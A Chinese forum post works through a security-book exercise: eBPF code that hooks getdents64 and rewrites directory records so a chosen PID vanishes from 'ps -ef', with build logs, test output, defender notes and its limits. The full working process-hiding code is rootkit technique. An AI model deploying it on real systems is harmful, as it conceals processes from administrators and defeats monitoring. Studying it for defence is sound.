
[分享]基于eBPF的进程隐藏技术

2025-1-18 19:45
3141

这是一个练习项目,是对《eBPF云原生安全:原理与实践》chapter14中hide-pid示例的代码实践,仅修改了用于指定pid的一小部分代码。最终实现了通过-p参数指定要隐藏的进程号,使该进程在ps -ef的输出中不可见。

实验环境

操作系统版本

Ubuntu 22.04.3 LTS
 
# uname -a
Linux Jtian 5.15.167.4-microsoft-standard-WSL2 #1 SMP Tue Nov 5 00:21:55 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

编译环境准备

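# Book sample code that this exercise is based on.
git clone https://github.com/mozillazg/cloud-native-security-with-ebpf.git

# Fetch the prebuilt bpftool release. The original listing gave only the URL;
# without a download command the shell would try to execute the URL itself.
wget https://github.com/libbpf/bpftool/releases/download/v7.5.0/bpftool-v7.5.0-amd64.tar.gz
# This binary is copied into /usr/bin and later run as root, so compare the
# archive's SHA-256 with the value published for the release before unpacking:
#   sha256sum bpftool-v7.5.0-amd64.tar.gz   # expect <SHA256_FROM_RELEASE_PAGE>
tar xvf bpftool-v7.5.0-amd64.tar.gz
cp bpftool /usr/bin

apt-get update
apt-get install libelf-dev
apt-get install clang

apt-get install golang-1.23-go
# Creates the symlink "go" in the current directory, so run this from a
# directory that is on PATH.
ln -s /usr/lib/go-1.23/bin/go go
# Module downloads now go through the third-party proxy goproxy.cn; the Go
# checksum database (GOSUMDB) still verifies module contents unless disabled.
go env -w GOPROXY=https://goproxy.cn,direct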

hide-pid-p主要代码

参考cloud-native-security-with-ebpf/chapter14/hide-pid代码,只修改了main.go中获取pid的部分代码,使得可以通过-p参数隐藏指定的进程。

main.bpf.c

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "main.h"
 
// Perf event array used to send one struct event_t to user space each time a
// directory entry has been skipped (written by bpf_perf_event_output in the
// sys_exit probe).
struct {
    __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
    __uint(key_size, sizeof(u32));
    __uint(value_size, sizeof(u32));
} events SEC(".maps");
 
// Carries the user-space dirent buffer address from the sys_enter probe to the
// sys_exit probe. Key: the 64-bit value of bpf_get_current_pid_tgid().
// Value: the buffer pointer stored as an unsigned long. The LRU type bounds
// the map at 2048 entries; no code in this file deletes entries explicitly.
struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 2048);
    __type(key, u64);
    __type(value, long unsigned int);
} dirp_map SEC(".maps");
 
// Read-only configuration; this file only reads its to_hide_pid character
// array. struct config_t is declared in main.h, which is not shown here.
// Presumably the user-space loader fills it in before load - confirm there.
static const volatile struct config_t configs;
 
// Entry probe for getdents64(2): records where the caller's dirent buffer
// lives so the exit probe can find it once the kernel has filled it in.
// Always returns 0.
SEC("tracepoint/syscalls/sys_enter_getdents64")
int tracepoint_syscalls__sys_enter_getdents64(struct trace_event_raw_sys_enter *ctx)
{
    // args[1] is the second syscall argument, i.e. the user-space buffer that
    // will receive the struct linux_dirent64 records.
    struct linux_dirent64 *user_buf = (struct linux_dirent64 *)BPF_CORE_READ(ctx, args[1]);
    // The full 64-bit pid_tgid value is the map key, so each thread has its
    // own slot.
    u64 pid_tgid = bpf_get_current_pid_tgid();

    bpf_map_update_elem(&dirp_map, &pid_tgid, &user_buf, BPF_ANY);
    return 0;
}
 
// Exit probe for getdents64(2): walks the directory records the kernel just
// copied to the caller and, if one is named configs.to_hide_pid, enlarges the
// previous record's d_reclen so that the matching record is stepped over.
//
// Only the buffer returned by getdents64 is touched. Nothing in this function
// affects path lookups, so /proc/<pid> itself remains reachable by name.
//
// Defender notes: the tampering depends on bpf_probe_write_user(). The kernel
// logs a warning when a program using that helper is loaded, and kernel
// lockdown can refuse the helper. Nothing in this file conceals the programs
// or maps themselves, so they should remain visible to BPF inspection tools
// such as bpftool while the loader runs.
//
// Always returns 0.
SEC("tracepoint/syscalls/sys_exit_getdents64")
int tracepoint_syscalls__sys_exit_getdents64(struct trace_event_raw_sys_exit *ctx) {
    struct event_t event = { 0 };
    // Same 64-bit pid_tgid value the entry probe used as the map key
    // (despite the variable name it is not only the thread id).
    u64 tid = bpf_get_current_pid_tgid();
    // Syscall return value: bytes of dirent data placed in the user buffer.
    int total_bytes_read = BPF_CORE_READ(ctx, ret);
    if (total_bytes_read <= 0) {
        // Error or end of directory: nothing to inspect.
        return 0;
    }
    // User buffer address saved by the entry probe for this thread.
    long unsigned int *pp = bpf_map_lookup_elem(&dirp_map, &tid);
    if (!pp) {
        return 0;
    }
    // Copy the configured name from read-only data into a stack buffer,
    // stopping once the terminating NUL has been copied.
    char to_hide_pid[MAX_NAME];
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        to_hide_pid[i] = configs.to_hide_pid[i];
        if (to_hide_pid[i] == '\0') {
            break;
        }
    }
 
    // overwrite records whether a match was found; overwrite_ret keeps the
    // result of bpf_probe_write_user so user space can see whether it succeeded.
    bool overwrite = false;
    int overwrite_ret = 0;
 
    // Cursor state: the previously visited record, the current record, and a
    // scratch buffer for the current record's name.
    struct linux_dirent64 *pre_dirent_start = (struct linux_dirent64*)*pp;
    struct linux_dirent64 *current_dirent_start;
    char current_dir[MAX_NAME] = {};
    // Record lengths (d_reclen values) and the running byte count consumed.
    short unsigned int pre_reclen = 0;
    short unsigned int current_reclen = 0;
    short unsigned int overwrite_reclen = 0;
    int current_total = 0;
 
    // Fixed upper bound of 1024 records per call.
    #pragma unroll
    for (int i = 0; i < 1024; i++) {
        // Address of the current struct linux_dirent64 record: previous record
        // plus its length. On the first iteration pre_reclen is 0, so this is
        // the start of the buffer.
        current_dirent_start = (struct linux_dirent64*)((void *)pre_dirent_start + pre_reclen);
        // Read the d_name and d_reclen fields from user memory.
        // NOTE(review): the return values of both reads are not checked.
        bpf_probe_read_user(&current_dir, sizeof(current_dir), (char *)current_dirent_start->d_name);
        bpf_probe_read_user(&current_reclen, sizeof(current_reclen), (void *)&current_dirent_start->d_reclen);
 
        // Is this the directory entry of the pid to hide?
        // str_eq is not defined in this file (presumably main.h - confirm).
        if (str_eq(current_dir, to_hide_pid, MAX_NAME)) {
            // Enlarge the previous record's d_reclen so it also spans the
            // current record. A reader stepping through the buffer by d_reclen
            // then skips the current record, which is why the pid drops out of
            // ps output.
            overwrite_reclen = pre_reclen + current_reclen;
            overwrite_ret = bpf_probe_write_user(&pre_dirent_start->d_reclen, &overwrite_reclen, sizeof(overwrite_reclen));
            overwrite = true;
            break;
        }
 
        // Stop before walking past the bytes the syscall actually returned.
        current_total += current_reclen;
        if (current_total >= total_bytes_read) {
            break;
        }
 
        // Advance to the next record.
        pre_reclen = current_reclen;
        pre_dirent_start = current_dirent_start;
    }
 
    if (!overwrite) {
        // No matching entry in this buffer: emit no event.
        return 0;
    }
 
 
    // Report the modification to user space. The upper 32 bits of pid_tgid
    // are the tgid (the process id as user space sees it).
    event.pid = bpf_get_current_pid_tgid() >> 32;
    event.ret = overwrite_ret;
    #pragma unroll
    for (int i = 0; i < MAX_NAME; i++) {
        event.hidden_pid[i] = configs.to_hide_pid[i];
        if (event.hidden_pid[i] == '\0') {
            break;
        }
    }
    // Command name of the task that called getdents64 (e.g. "ps").
    bpf_get_current_comm(&event.comm, sizeof(event.comm));
 
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(struct event_t));
 
    return 0;
}
 
 
// License string placed in the "license" ELF section and read by the kernel at
// load time. GPL-only helpers used in this file (for example
// bpf_probe_write_user) are available only to GPL-compatible programs.
char _license[] SEC("license") = "GPL";

main.go

package main
 
import (
    "flag"
    "bytes"
    "context"
    "encoding/binary"
    "fmt"
    "log"
    "os"
    "os/signal"
    "syscall"
 
    bpf "github.com/aquasecurity/libbpfgo"
)
 
// Event is the record decoded from the "events" perf buffer. parseEvent reads
// it with binary.Read in little-endian order, so the field order and sizes
// (4 + 4 + 8 + 16 = 32 bytes) have to match what the BPF program emits as
// struct event_t. That struct is declared in main.h, which is not shown here -
// confirm the layout against that header.
type Event struct {
    // Process id of the task whose getdents64 result was modified.
    Pid       uint32
    // Result of bpf_probe_write_user.
    // NOTE(review): the BPF side assigns an int to this field, so a negative
    // error code would print as a large unsigned value - confirm.
    Ret       uint32
    // Name of the hidden /proc entry (the pid as ASCII digits), NUL-padded.
    HiddenPid [8]byte
    // Command name of the calling task, as filled in by bpf_get_current_comm.
    Comm      [16]byte
}
 
// Config is the value written into the BPF object's "configs" global before
// the object is loaded. ToHidePid holds the -p argument copied byte for byte,
// NUL-padded to 8 bytes.
type Config struct {
    ToHidePid [8]byte
}
 
// parseEvent decodes one raw perf-buffer record into an Event.
//
// The bytes are read as little-endian fixed-size fields in the order declared
// on Event. If binary.Read fails (for example because the record is shorter
// than the struct), its error is returned together with a nil Event.
func parseEvent(data []byte) (*Event, error) {
    decoded := new(Event)
    reader := bytes.NewBuffer(data)
    if err := binary.Read(reader, binary.LittleEndian, decoded); err != nil {
        return nil, err
    }
    return decoded, nil
}
 
// main loads main.bpf.o, passes the -p value to the BPF program as the name to
// hide, attaches every program in the object, and then logs one line per
// event received from the "events" perf buffer until SIGINT or SIGTERM.
func main() {
    // Single error variable shared by the whole function. This defer is
    // registered first and therefore runs last: the cleanup defers registered
    // below execute before log.Fatalf terminates the process.
    var err error
    defer func() {
        if err != nil {
            log.Fatalf("%+v", err)
        }
    }()
 
    // Earlier variant, kept for reference: it used this loader's own pid
    // (os.Getpid) as the value to hide instead of a command-line argument.
    /*
    pid := os.Getpid()
    log.Printf("pid: %d\n", pid)
    toHidePid := [8]byte{}
    bs := []byte(fmt.Sprintf("%d", pid))
    for i, v := range bs {
        toHidePid[i] = v
    }*/
 
    // -p takes the pid as a string; without it only the usage line is printed.
    var pidStr string
    flag.StringVar(&pidStr, "p", "", "进程ID")
    flag.Parse()
 
    if pidStr == "" {
        fmt.Printf("Usage: %s -p pid\n\n", os.Args[0])
        return
    }
     
    // NOTE(review): pidStr is not checked to be numeric, and copy silently
    // truncates anything longer than 8 bytes.
    var toHidePid [8]byte
    copy(toHidePid[:], pidStr)
 
    // Open the compiled BPF object from the current working directory.
    bpfModule, err := bpf.NewModuleFromFile("main.bpf.o")
    if err != nil {
        return
    }
    defer bpfModule.Close()
 
    // Set the "configs" global before BPFLoadObject is called.
    config := Config{ToHidePid: toHidePid}
    if err = bpfModule.InitGlobalVariable("configs", config); err != nil {
        return
    }
 
    if err = bpfModule.BPFLoadObject(); err != nil {
        return
    }
    // Attach every program found in the object (the two getdents64
    // tracepoint probes in main.bpf.c).
    progIter := bpfModule.Iterator()
    for {
        prog := progIter.NextProgram()
        if prog == nil {
            break
        }
        _, err = prog.AttachGeneric()
        if err != nil {
            return
        }
    }
    log.Println("tracing...")
    // Channels for event payloads and lost-event counts from the perf buffer.
    eventsChannel := make(chan []byte)
    lostChannel := make(chan uint64)
    pb, err := bpfModule.InitPerfBuf("events", eventsChannel, lostChannel, 1024)
    if err != nil {
        return
    }
    //log.Printf("will hide pid %d", pid)
    // ctx is cancelled on Ctrl-C (os.Interrupt) or SIGTERM.
    ctx, stop := signal.NotifyContext(context.Background(), os.Interrupt, syscall.SIGTERM)
 
    pb.Start()
    defer func() {
        pb.Stop()
        pb.Close()
        stop()
    }()
 
loop:
    for {
        select {
        case data := <-eventsChannel:
            // One record per modified getdents64 result; a decode failure
            // ends the program through the deferred error handler.
            event, e := parseEvent(data)
            if e != nil {
                err = e
                return
            } else {
                log.Printf("pid: %d, comm: %s, hidden_pid: %s ret: %d",
                    event.Pid, event.Comm, event.HiddenPid, event.Ret)
            }
        case n := <-lostChannel:
            log.Printf("lost %d events", n)
        case <-ctx.Done():
            break loop
        }
    }
    log.Println("bye bye~")
}

编译

执行make build,生成 main 和 main.bpf.o 文件。

root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make clean
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src clean
rm -rf ./output
rm -rf vmlinux.h
rm -rf main
rm -rf main.bpf.o main.o
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  CLEAN
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main.bpf.c  main.go  main.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# make build
make -C . main
make[1]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
mkdir -p ./output/libbpf
CC="gcc" CFLAGS="-ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function" LD_FLAGS="" \
   make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src \
        BUILD_STATIC_ONLY=1 \
        OBJDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf \
        DESTDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output \
        INCLUDEDIR= LIBDIR= UAPIDIR= prefix= libdir= install
make -C /root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src UAPIDIR=/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output install_uapi_headers
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  MKDIR    /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_errno.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/netlink.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/nlattr.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/str_error.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/libbpf_probes.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/bpf_prog_linfo.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/btf_dump.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/hashmap.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/ringbuf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/strset.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/linker.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/gen_loader.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/relo_core.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/usdt.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/zip.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/elf.o
  CC       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/staticobjs/features.o
  AR       /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
  INSTALL  bpf.h libbpf.h btf.h libbpf_common.h libbpf_legacy.h bpf_helpers.h bpf_helper_defs.h bpf_tracing.h bpf_endian.h bpf_core_read.h skel_internal.h libbpf_version.h usdt.bpf.h
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.pc
  INSTALL  /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf/libbpf.a
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
make[2]: Entering directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
  INSTALL  ../include/uapi/linux/bpf.h ../include/uapi/linux/bpf_common.h ../include/uapi/linux/btf.h
make[2]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/libbpf/src'
INFO: generating vmlinux.h from /sys/kernel/btf/vmlinux
clang -ggdb -gdwarf -O2 -Wall -fpie -Wno-unused-variable -Wno-unused-function -target bpf -D__TARGET_ARCH_x86 -I. -I./output -c main.bpf.c -o main.bpf.o
CC=clang \
        CGO_CFLAGS="-I/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output" \
        CGO_LDFLAGS="-lelf -lz /root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p/output/libbpf.a" \
        GOARCH=amd64 \
        go build \
        -tags netgo -ldflags '-w -extldflags "-static"' \
        -o main ./main.go
make[1]: Leaving directory '/root/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p'
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ls
Makefile  README.md  main  main.bpf.c  main.bpf.o  main.go  main.h  output  vmlinux.h
root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p#

测试效果

随便启动一个python进程,并获得进程号pid

root@Jtian:~# python
Python 3.10.12 (main, Nov  6 2024, 20:22:13) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>>

获得python的pid号为 119558

root@Jtian:~# ps -ef|grep python
root      119558    3209  0 19:27 pts/0    00:00:00 python
root      119741   90282  0 19:28 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#
root@Jtian:~#

隐藏指定进程

root@Jtian:~/project/03.eBPF/cloud-native-security-with-ebpf/chapter14/hide-pid-p# ./main -p 119558
libbpf: loading main.bpf.o
libbpf: elf: section(3) tracepoint/syscalls/sys_enter_getdents64, size 176, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_enter_getdents64': found program 'tracepoint_syscalls__sys_enter_getdents64' at insn offset 0 (0 bytes), code size 22 insns (176 bytes)
libbpf: elf: section(4) .reltracepoint/syscalls/sys_enter_getdents64, size 16, link 30, flags 40, type=9
libbpf: elf: section(5) tracepoint/syscalls/sys_exit_getdents64, size 130472, link 0, flags 6, type=1
libbpf: sec 'tracepoint/syscalls/sys_exit_getdents64': found program 'tracepoint_syscalls__sys_exit_getdents64' at insn offset 0 (0 bytes), code size 16309 insns (130472 bytes)
libbpf: elf: section(6) .reltracepoint/syscalls/sys_exit_getdents64, size 160, link 30, flags 40, type=9
libbpf: elf: section(7) .maps, size 56, link 0, flags 3, type=1
libbpf: elf: section(8) .rodata, size 8, link 0, flags 2, type=1
libbpf: elf: section(9) license, size 4, link 0, flags 3, type=1
libbpf: license of main.bpf.o is GPL
libbpf: elf: section(20) .BTF, size 3677, link 0, flags 0, type=1
libbpf: elf: section(22) .BTF.ext, size 157068, link 0, flags 0, type=1
libbpf: elf: section(30) .symtab, size 6864, link 1, flags 0, type=2
libbpf: looking for externs among 286 symbols...
libbpf: collected 0 externs total
libbpf: map 'dirp_map': at sec_idx 7, offset 0.
libbpf: map 'dirp_map': found type = 9.
libbpf: map 'dirp_map': found key [8], sz = 8.
libbpf: map 'dirp_map': found value [12], sz = 8.
libbpf: map 'dirp_map': found max_entries = 2048.
libbpf: map 'events': at sec_idx 7, offset 32.
libbpf: map 'events': found type = 4.
libbpf: map 'events': found key_size = 4.
libbpf: map 'events': found value_size = 4.
libbpf: map 'main.rodata' (global data): at sec_idx 8, offset 0, flags 80.
libbpf: map 2 is "main.rodata"
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': collecting relocation for section(3) 'tracepoint/syscalls/sys_enter_getdents64'
libbpf: sec '.reltracepoint/syscalls/sys_enter_getdents64': relo #0: insn #16 against 'dirp_map'
....
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #512: patched insn #16188 (ALU/ALU64) imm 16 -> 16
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: <byte_off> [34] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: matching candidate #0 <byte_off> [36451] struct linux_dirent64.d_reclen (0:2 @ offset 16)
libbpf: prog 'tracepoint_syscalls__sys_exit_getdents64': relo #513: patched insn #16247 (ALU/ALU64) imm 16 -> 16
libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...

观察进程隐藏效果 | 针对ps -ef有效,但针对ls -l /proc/xxx无效

针对ps -ef有效

root@Jtian:~# ps -ef|grep python
root      120545   90282  0 19:31 pts/2    00:00:00 grep --color=auto python
root@Jtian:~#

每次执行ps -ef,进程隐藏程序都会打印一条相应的日志。

libbpf: map 'dirp_map': created successfully, fd=7
libbpf: map 'events': setting size to 32
libbpf: map 'events': created successfully, fd=8
libbpf: map 'main.rodata': created successfully, fd=9
2025/01/18 19:29:52 tracing...
2025/01/18 19:31:42 pid: 121264, comm: ps, hidden_pid: 119558 ret: 0

针对ls -l /proc/xxx无效:程序只在getdents64返回的目录项中按名称匹配并跳过目标项,而按路径直接访问/proc/<pid>并不依赖/proc的目录列表,所以仍然可以看到该进程的信息。

root@Jtian:~#
root@Jtian:~# ls -l /proc/119558
total 0
-r--r--r--  1 root root 0 Jan 18 19:37 arch_status
dr-xr-xr-x  2 root root 0 Jan 18 19:37 attr
-r--------  1 root root 0 Jan 18 19:37 auxv
-r--r--r--  1 root root 0 Jan 18 19:37 cgroup
--w-------  1 root root 0 Jan 18 19:37 clear_refs
-r--r--r--  1 root root 0 Jan 18 19:28 cmdline
-rw-r--r--  1 root root 0 Jan 18 19:37 comm
-rw-r--r--  1 root root 0 Jan 18 19:37 coredump_filter
-r--r--r--  1 root root 0 Jan 18 19:37 cpuset
lrwxrwxrwx  1 root root 0 Jan 18 19:37 cwd -> /root
-r--------  1 root root 0 Jan 18 19:37 environ
lrwxrwxrwx  1 root root 0 Jan 18 19:37 exe -> /usr/bin/python3.10
dr-x------  2 root root 0 Jan 18 19:37 fd
dr-xr-xr-x  2 root root 0 Jan 18 19:37 fdinfo
-rw-r--r--  1 root root 0 Jan 18 19:37 gid_map
-r--------  1 root root 0 Jan 18 19:37 io
-r--r--r--  1 root root 0 Jan 18 19:37 limits
-rw-r--r--  1 root root 0 Jan 18 19:37 loginuid
dr-x------  2 root root 0 Jan 18 19:37 map_files
-r--r--r--  1 root root 0 Jan 18 19:37 maps
-rw-------  1 root root 0 Jan 18 19:37 mem
-r--r--r--  1 root root 0 Jan 18 19:37 mountinfo
-r--r--r--  1 root root 0 Jan 18 19:37 mounts
-r--------  1 root root 0 Jan 18 19:37 mountstats
dr-xr-xr-x 65 root root 0 Jan 18 19:37 net
dr-x--x--x  2 root root 0 Jan 18 19:37 ns
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_adj
-r--r--r--  1 root root 0 Jan 18 19:37 oom_score
-rw-r--r--  1 root root 0 Jan 18 19:37 oom_score_adj
-r--------  1 root root 0 Jan 18 19:37 pagemap
-r--------  1 root root 0 Jan 18 19:37 personality
-rw-r--r--  1 root root 0 Jan 18 19:37 projid_map
lrwxrwxrwx  1 root root 0 Jan 18 19:37 root -> /
-rw-r--r--  1 root root 0 Jan 18 19:37 sched
-r--r--r--  1 root root 0 Jan 18 19:37 schedstat
-r--r--r--  1 root root 0 Jan 18 19:37 sessionid
-rw-r--r--  1 root root 0 Jan 18 19:37 setgroups
-r--r--r--  1 root root 0 Jan 18 19:37 smaps
-r--r--r--  1 root root 0 Jan 18 19:37 smaps_rollup
-r--------  1 root root 0 Jan 18 19:37 stack
-r--r--r--  1 root root 0 Jan 18 19:28 stat
-r--r--r--  1 root root 0 Jan 18 19:37 statm
-r--r--r--  1 root root 0 Jan 18 19:28 status
-r--------  1 root root 0 Jan 18 19:37 syscall
dr-xr-xr-x  3 root root 0 Jan 18 19:37 task
-rw-r--r--  1 root root 0 Jan 18 19:37 timens_offsets
-r--r--r--  1 root root 0 Jan 18 19:37 timers
-rw-rw-rw-  1 root root 0 Jan 18 19:37 timerslack_ns
-rw-r--r--  1 root root 0 Jan 18 19:37 uid_map
-r--r--r--  1 root root 0 Jan 18 19:37 wchan
root@Jtian:~#
